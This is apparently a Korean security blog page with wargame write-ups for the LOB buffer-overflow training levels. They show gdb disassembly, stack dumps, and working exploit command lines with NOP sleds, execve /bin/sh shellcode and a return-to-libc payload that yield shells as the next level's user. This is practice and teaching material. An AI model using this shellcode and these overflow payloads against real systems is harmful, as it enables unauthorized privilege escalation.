0xbffffcbc: 0x00000000 0x36690000 0x2f003638 0x656d6f68

0xbffffccc: 0x6c6f772f 0x6e616d66 0x706d742f 0x7474612f

0xbffffcdc: 0x6d6b6361 0xbfbf0065 0xbfbfbfbf 0xbfbfbfbf

0xbffffcec: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

0xbffffcfc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

---Type <return> to continue, or q <return> to quit---

0xbffffd0c: 0xfd6cbfbf 0x9000bf00 0x90909090 0x90909090

0xbffffd1c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd2c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd3c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd4c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd5c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd6c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd7c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd8c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd9c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdac: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdbc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdcc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffddc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdec: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdfc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe0c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe1c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe2c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe3c: 0x31909090 0x2f6850c0 0x6868732f 0x6e69622f

0xbffffe4c: 0x5350e389 0xb099e189 0x0080cd0b 0x00000000

0xbffffe5c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe6c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe7c: 0x00000000 0x00000000 0x00000000 0x00000000

---Type <return> to continue, or q <return> to quit---

0xbffffe8c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe9c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffeac: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffebc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffecc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffedc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffeec: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffefc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff0c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff1c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff2c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff3c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff4c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff5c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff6c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff7c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff8c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff9c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffac: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffbc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffcc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffdc: 0x00000000 0x6f682f00 0x772f656d 0x6d666c6f

0xbfffffec: 0x742f6e61 0x612f706d 0x63617474 0x00656d6b

0xbffffffc: 0x00000000 Cannot access memory at address 0xc0000000

(gdb)

(gdb) q

The program is running. Exit anyway? (y or n) y

[wolfman@localhost tmp]$ bash2

[wolfman@localhost tmp]$ ./attackme `python -c 'print "\xbf"*44+"\x6c\xfd\xff\x

bf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x6

2\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l?

풺ash$ id

uid=505(wolfman) gid=505(wolfman) groups=505(wolfman)

bash$ q

sh: q: command not found

bash$ exit

exit

[wolfman@localhost tmp]$ cd ../

[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "\xbf"*44+"\x6c\xfd\xf

f\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f

\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l?

풺ash$ id

uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505

(wolfman)

bash$ whoami

darkelf

bash$ my-pass

euid = 506

kernel crashed

bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

orge -> troll (0)	2014.02.20
darkelf->orge (0)	2014.02.20
orc -> wolfman (0)	2014.02.20
gremlin -> cobolt (0)	2014.02.20
gate -> gremlin (0)	2014.02.20

Posted by windowhan

orc -> wolfman

Wargame/LOB (Redhat9) 2014. 2. 20. 15:11

중간에 코볼트는 어디에 적어뒀는지 기억이 나질않는다;;

[orc@localhost tmp]$ gdb -q wolfman

(gdb) disas main

Dump of assembler code for function main:

0x8048500 <main>: push %ebp

0x8048501 <main+1>: mov %esp,%ebp

0x8048503 <main+3>: sub $0x2c,%esp

0x8048506 <main+6>: cmpl $0x1,0x8(%ebp)

0x804850a <main+10>: jg 0x8048523 <main+35>

0x804850c <main+12>: push $0x8048640

0x8048511 <main+17>: call 0x8048410 <printf>

0x8048516 <main+22>: add $0x4,%esp

0x8048519 <main+25>: push $0x0

0x804851b <main+27>: call 0x8048420 <exit>

0x8048520 <main+32>: add $0x4,%esp

0x8048523 <main+35>: nop

0x8048524 <main+36>: movl $0x0,0xffffffd4(%ebp)

0x804852b <main+43>: nop

0x804852c <main+44>: lea 0x0(%esi,1),%esi

0x8048530 <main+48>: mov 0xffffffd4(%ebp),%eax

0x8048533 <main+51>: lea 0x0(,%eax,4),%edx

0x804853a <main+58>: mov 0x8049760,%eax

0x804853f <main+63>: cmpl $0x0,(%eax,%edx,1)

0x8048543 <main+67>: jne 0x8048547 <main+71>

0x8048545 <main+69>: jmp 0x8048587 <main+135>

0x8048547 <main+71>: mov 0xffffffd4(%ebp),%eax

0x804854a <main+74>: lea 0x0(,%eax,4),%edx

0x8048551 <main+81>: mov 0x8049760,%eax

0x8048556 <main+86>: mov (%eax,%edx,1),%edx

0x8048559 <main+89>: push %edx

0x804855a <main+90>: call 0x80483f0 <strlen>

0x804855f <main+95>: add $0x4,%esp

0x8048562 <main+98>: mov %eax,%eax

0x8048564 <main+100>: push %eax

0x8048565 <main+101>: push $0x0

0x8048567 <main+103>: mov 0xffffffd4(%ebp),%eax

0x804856a <main+106>: lea 0x0(,%eax,4),%edx

0x8048571 <main+113>: mov 0x8049760,%eax

0x8048576 <main+118>: mov (%eax,%edx,1),%edx

0x8048579 <main+121>: push %edx

0x804857a <main+122>: call 0x8048430 <memset>

0x804857f <main+127>: add $0xc,%esp

0x8048582 <main+130>: incl 0xffffffd4(%ebp)

0x8048585 <main+133>: jmp 0x8048530 <main+48>

---Type <return> to continue, or q <return> to quit---

0x8048587 <main+135>: mov 0xc(%ebp),%eax

0x804858a <main+138>: add $0x4,%eax

0x804858d <main+141>: mov (%eax),%edx

0x804858f <main+143>: add $0x2f,%edx

0x8048592 <main+146>: cmpb $0xbf,(%edx)

0x8048595 <main+149>: je 0x80485b0 <main+176>

0x8048597 <main+151>: push $0x804864c

0x804859c <main+156>: call 0x8048410 <printf>

0x80485a1 <main+161>: add $0x4,%esp

0x80485a4 <main+164>: push $0x0

0x80485a6 <main+166>: call 0x8048420 <exit>

0x80485ab <main+171>: add $0x4,%esp

0x80485ae <main+174>: mov %esi,%esi

0x80485b0 <main+176>: mov 0xc(%ebp),%eax

0x80485b3 <main+179>: add $0x4,%eax

0x80485b6 <main+182>: mov (%eax),%edx

0x80485b8 <main+184>: push %edx

0x80485b9 <main+185>: lea 0xffffffd8(%ebp),%eax

0x80485bc <main+188>: push %eax

0x80485bd <main+189>: call 0x8048440 <strcpy>

0x80485c2 <main+194>: add $0x8,%esp

0x80485c5 <main+197>: lea 0xffffffd8(%ebp),%eax

0x80485c8 <main+200>: push %eax

0x80485c9 <main+201>: push $0x8048669

0x80485ce <main+206>: call 0x8048410 <printf>

0x80485d3 <main+211>: add $0x8,%esp

0x80485d6 <main+214>: push $0x28

0x80485d8 <main+216>: push $0x0

0x80485da <main+218>: lea 0xffffffd8(%ebp),%eax

0x80485dd <main+221>: push %eax

0x80485de <main+222>: call 0x8048430 <memset>

0x80485e3 <main+227>: add $0xc,%esp

0x80485e6 <main+230>: leave

0x80485e7 <main+231>: ret

0x80485e8 <main+232>: nop

0x80485e9 <main+233>: nop

0x80485ea <main+234>: nop

0x80485eb <main+235>: nop

0x80485ec <main+236>: nop

0x80485ed <main+237>: nop

0x80485ee <main+238>: nop

---Type <return> to continue, or q <return> to quit---

0x80485ef <main+239>: nop

End of assembler dump.

(gdb) b *main+231

Breakpoint 1 at 0x80485e7

(gdb) r `python -c 'print "\xbf"*44+"\xec\xfc\xff\xbf"'``python -c 'print "\x90

"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89

\xe1\x99\xb0\x0b\xcd\x80"'`

Starting program: /home/orc/tmp/wolfman `python -c 'print "\xbf"*44+"\xec\xfc\xf

f\xbf"'``python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x

62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

stack is still your friend.

Program exited normally.

(gdb) r `python -c 'print "\xbf"*44+"\xec\xfc\xbf\xbf"'``python -c 'print "\x90

"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89

\xe1\x99\xb0\x0b\xcd\x80"'`

Starting program: /home/orc/tmp/wolfman `python -c 'print "\xbf"*44+"\xec\xfc\xb

f\xbf"'``python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x

62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜賃옜릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱1픐h//shh/bin됥PS됣솻

Breakpoint 1, 0x80485e7 in main ()

(gdb) x/200x $esp-100

0xbffffaf8: 0xfffffe75 0x4005d920 0x400143e0 0xbffffb1c

0xbffffb08: 0x40066070 0x40106980 0x4000ae60 0xbffffba4

0xbffffb18: 0xbffffb58 0x080485e3 0xbffffb30 0x00000000

0xbffffb28: 0x00000028 0x00000016 0x00000000 0x00000000

0xbffffb38: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb48: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb58: 0xbfbfbfbf 0xbfbffcec 0x90909090 0x90909090

0xbffffb68: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb78: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb88: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb98: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffba8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbb8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbc8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbd8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbe8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbf8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc08: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc18: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc28: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc38: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc48: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc58: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc68: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc78: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc88: 0x90909090 0x6850c031 0x68732f2f 0x69622f68

0xbffffc98: 0x50e3896e 0x99e18953 0x80cd0bb0 0x6d6f6800

0xbffffca8: 0x726f2f65 0x6d742f63 0x6f772f70 0x616d666c

0xbffffcb8: 0xbfbf006e 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

0xbffffcc8: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

0xbffffcd8: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xfcecbfbf

0xbffffce8: 0x9090bfbf 0x90909090 0x90909090 0x90909090

0xbffffcf8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd08: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd18: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd28: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd38: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd48: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd58: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd68: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd78: 0x90909090 0x90909090 0x90909090 0x90909090

---Type <return> to continue, or q <return> to quit---

0xbffffd88: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd98: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffda8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdb8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdc8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdd8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffde8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdf8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe08: 0x90909090 0x90909090 0x90909090 0xc0319090

(gdb)

(gdb) x/200x $esp

0xbffffb5c: 0xbfbffcec 0x90909090 0x90909090 0x90909090

0xbffffb6c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb7c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb8c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb9c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbac: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbbc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbcc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbdc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbec: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbfc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc0c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc1c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc2c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc3c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc4c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc5c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc6c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc7c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc8c: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e

0xbffffc9c: 0x99e18953 0x80cd0bb0 0x6d6f6800 0x726f2f65

0xbffffcac: 0x6d742f63 0x6f772f70 0x616d666c 0xbfbf006e

0xbffffcbc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

0xbffffccc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

0xbffffcdc: 0xbfbfbfbf 0xbfbfbfbf 0xfcecbfbf 0x9090bfbf

0xbffffcec: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffcfc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd0c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd1c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd2c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd3c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd4c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd5c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd6c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd7c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd8c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd9c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdac: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdbc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdcc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffddc: 0x90909090 0x90909090 0x90909090 0x90909090

---Type <return> to continue, or q <return> to quit---

0xbffffdec: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdfc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe0c: 0x90909090 0x90909090 0xc0319090 0x2f2f6850

0xbffffe1c: 0x2f686873 0x896e6962 0x895350e3 0x0bb099e1

0xbffffe2c: 0x000080cd 0x00000000 0x00000000 0x00000000

0xbffffe3c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe4c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe5c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe6c: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb) q

The program is running. Exit anyway? (y or n) y

[orc@localhost tmp]$ ./wolfman `python -c 'print "\xbf"*44+"\xec\xfd\xff\xbf"'`

`python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\

x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜入?릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?/div>

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣솻

bash$ id

uid=504(orc) gid=504(orc) groups=504(orc)

bash$ q

sh: q: command not found

bash$ exit

exit

[orc@localhost tmp]$ ls

core wolfman

[orc@localhost tmp]$ rm core

[orc@localhost tmp]$ cd ../

[orc@localhost orc]$ ./wolfman `python -c 'print "\xbf"*44+"\xec\xfd\xff\xbf"'`

`python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\

x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜入?릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?/div>

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣솻

bash$ id

uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)

bash$ my-pass

euid = 505

love eyuna

bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

orge -> troll (0)	2014.02.20
darkelf->orge (0)	2014.02.20
wolfman -> darkelf (0)	2014.02.20
gremlin -> cobolt (0)	2014.02.20
gate -> gremlin (0)	2014.02.20

Posted by windowhan

gremlin -> cobolt

Wargame/LOB (Redhat9) 2014. 2. 20. 15:09

shellcode를 쓰기에는 너무 비좁은 버퍼...

(사실 버퍼가 작지않아도 shellcode는 너무 지저분해서 않쓰려고했음 -_-;; )

어쨋든, 내가 생각한 방법은 2가지이다.

환경변수를 이용하는 방법과, RTL이다.

풀고나서 풀이를 검색해보니 Sasin이라는분이 상당히 독특하게 푸셨다.

argv[2]를 이용하면 저 비좁은 버퍼따위 문제가 되지않는다고한다(?)

argv[2]에 nop slide+shellcode를 넣어놓고, argv[1]가 buffer로 복사되어 buffer의 ret에 argv[2]의 주소를 넣는다.

자세한 주소는 http://0xffff.tistory.com/entry/Sasin-0xffff-BOF%EC%9B%90%EC%A0%95%EB%8C%80-2-gremlin-cobolt 에 있다.

실제로 많은 분들이 환경변수를 이용해서 풀고있지만, system함수를 이용해서 풀어보겠다.

0x40058ae0이 system함수의 주소이다.

이제 인자로 쓸 /bin/sh의 주소를 찾아보자...

다음은 /bin/sh의 주소를 찾을 소스다.

저렇게해서 돌렸더니 주소가 나온다.

그리고 간략하게 페이로드를 구성해보자면

[buffer + ebp (20bytes)] + [ret (4bytes)] + [dummy (4bytes)] + [argument (4bytes)] 가 된다.

실제로 페이로드 짠것이다.

./cobolt $(python -c 'print "a"*20+"\xe0\x8a\x05\x

40"+"aaaa"+"\xf9\xbf\x0f\x40"')

결과를 봐보자.

clear!!

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

orge -> troll (0)	2014.02.20
darkelf->orge (0)	2014.02.20
wolfman -> darkelf (0)	2014.02.20
orc -> wolfman (0)	2014.02.20
gate -> gremlin (0)	2014.02.20

Posted by windowhan

gate -> gremlin

Wargame/LOB (Redhat9) 2014. 2. 20. 15:09

쉘코드가 들어가는 전형적인 Buffer Overflow 해킹 문제이다.

simple BOF라고 해서, 처음에 구버전인 RedHat 6.2에서 root권한을 따기위해서 아등바등 했었던것이 기억이 난다.

buffer의 크기는 256.

간단하게 payload 구성을 보자.

[buffer (256 bytes)] + [ebp (4bytes)] + [ret (4bytes) ]

간단하게 페이로드를 구성을 해보았다.

buffer부터 ebp까지는 260bytes이다.

그러니 그 안에 nop slide와 shellcode를 집어넣으면 된다.

payload는 다음과 같다.

$(python -c 'print "\x90"*200 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*36

nop slide는 다음 명령어로 계속 차례를 넘기는 기능을 수행하니 대충 90이 위치한 자리를 ret에 덮으면 된다.

(gdb) x/100x $esp-100

0xbffffbb8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbc8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbd8: 0x90909090 0x90909090 0x6850c031 0x68732f2f

0xbffffbe8: 0x69622f68 0x50e3896e 0x99e18953 0x80cd0bb0

0xbffffbf8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc08: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc18: 0x90909090 0x4000fdf4 0x00000002 0xbffffc64

0xbffffc28: 0xbffffc70 0x40013868 0x00000002 0x08048380

0xbffffc38: 0x00000000 0x080483a1 0x08048430 0x00000002

0xbffffc48: 0xbffffc64 0x080482e0 0x080484bc 0x4000ae60

0xbffffc58: 0xbffffc5c 0x40013e90 0x00000002 0xbffffd50

0xbffffc68: 0xbffffd67 0x00000000 0xbffffe6e 0xbffffe90

0xbffffc78: 0xbffffe9a 0xbffffea8 0xbffffec7 0xbffffed4

0xbffffc88: 0xbffffeed 0xbfffff07 0xbfffff11 0xbfffff1f

0xbffffc98: 0xbfffff5f 0xbfffff6f 0xbfffff84 0xbfffff94

0xbffffca8: 0xbfffff9e 0xbfffffba 0xbfffffc5 0xbfffffd2

0xbffffcb8: 0xbfffffda 0x00000000 0x00000003 0x08048034

0xbffffcc8: 0x00000004 0x00000020 0x00000005 0x00000006

0xbffffcd8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffce8: 0x00000008 0x00000000 0x00000009 0x08048380

0xbffffcf8: 0x0000000b 0x000001f4 0x0000000c 0x000001f4

0xbffffd08: 0x0000000d 0x000001f4 0x0000000e 0x000001f4

0xbffffd18: 0x00000010 0x0febfbff 0x0000000f 0xbffffd4b

0xbffffd28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd38: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb)

0xbffffd48: 0x69000000 0x00363836 0x6d6f682f 0x61672f65

0xbffffd58: 0x742f6574 0x672f706d 0x6c6d6572 0x90006e69

0xbffffd68: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd78: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd88: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd98: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffda8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdb8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdc8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdd8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffde8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdf8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe08: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe18: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe28: 0x90909090 0x31909090 0x2f6850c0 0x6868732f

0xbffffe38: 0x6e69622f 0x5350e389 0xb099e189 0x9080cd0b

0xbffffe48: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe58: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe68: 0xf4909090 0x454c00fd 0x504f5353 0x7c3d4e45

0xbffffe78: 0x7273752f 0x6e69622f 0x73656c2f 0x70697073

0xbffffe88: 0x68732e65 0x00732520 0x52455355 0x454d414e

0xbffffe98: 0x4948003d 0x49535453 0x313d455a 0x00303030

0xbffffea8: 0x54534f48 0x454d414e 0x636f6c3d 0x6f686c61

0xbffffeb8: 0x6c2e7473 0x6c61636f 0x616d6f64 0x4c006e69

0xbffffec8: 0x414e474f 0x673d454d 0x00657461 0x4f4d4552

(gdb)

0xbffffed8: 0x4f484554 0x353d5453 0x36322e39 0x3931312e

0xbffffee8: 0x3636312e 0x49414d00 0x762f3d4c 0x732f7261

0xbffffef8: 0x6c6f6f70 0x69616d2f 0x61672f6c 0x54006574

0xbfffff08: 0x3d4d5245 0x69736e61 0x534f4800 0x50595454

0xbfffff18: 0x33693d45 0x50003638 0x3d485441 0x7273752f

0xbfffff28: 0x636f6c2f 0x622f6c61 0x2f3a6e69 0x3a6e6962

0xbfffff38: 0x7273752f 0x6e69622f 0x73752f3a 0x31582f72

0xbfffff48: 0x2f365231 0x3a6e6962 0x6d6f682f 0x61672f65

0xbfffff58: 0x622f6574 0x48006e69 0x3d454d4f 0x6d6f682f

0xbfffff68: 0x61672f65 0x49006574 0x5455504e 0x2f3d4352

0xbfffff78: 0x2f637465 0x75706e69 0x00637274 0x4c454853

0xbfffff88: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355

0xbfffff98: 0x7461673d 0x41420065 0x455f4853 0x2f3d564e

0xbfffffa8: 0x656d6f68 0x7461672f 0x622e2f65 0x72687361

0xbfffffb8: 0x414c0063 0x653d474e 0x53555f6e 0x54534f00

0xbfffffc8: 0x3d455059 0x756e694c 0x48530078 0x3d4c564c

0xbfffffd8: 0x534c0031 0x4c4f435f 0x3d53524f 0x6f682f00

0xbfffffe8: 0x672f656d 0x2f657461 0x2f706d74 0x6d657267

0xbffffff8: 0x006e696c 0x00000000 Cannot access memory at address

0xc0000000

대충 리턴어드레스를 0xbffffdf8로 잡아주자...

그러면 페이로드가 완성된다.

./gremlin $(python -c 'print "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*36+"\xf8\xfd\xff\xbf"')

성공!

괜히 귀찮게 쉘코드로 풀었네...

구버전인거 알았으니 별도의 프로텍션이 없으면 원샷으로 뚜러버려!

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

orge -> troll (0)	2014.02.20
darkelf->orge (0)	2014.02.20
wolfman -> darkelf (0)	2014.02.20
orc -> wolfman (0)	2014.02.20
gremlin -> cobolt (0)	2014.02.20

Posted by windowhan

이전 1 ··· 3 4 5 6 다음

windowhan lab

'분류 전체보기'에 해당되는 글 55건

darkelf->orge

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

wolfman -> darkelf

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

orc -> wolfman

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

gremlin -> cobolt

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

gate -> gremlin

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

카테고리

태그목록

최근에 올라온 글

최근에 달린 댓글

최근에 받은 트랙백

글 보관함

달력

링크

티스토리툴바


	by windowhan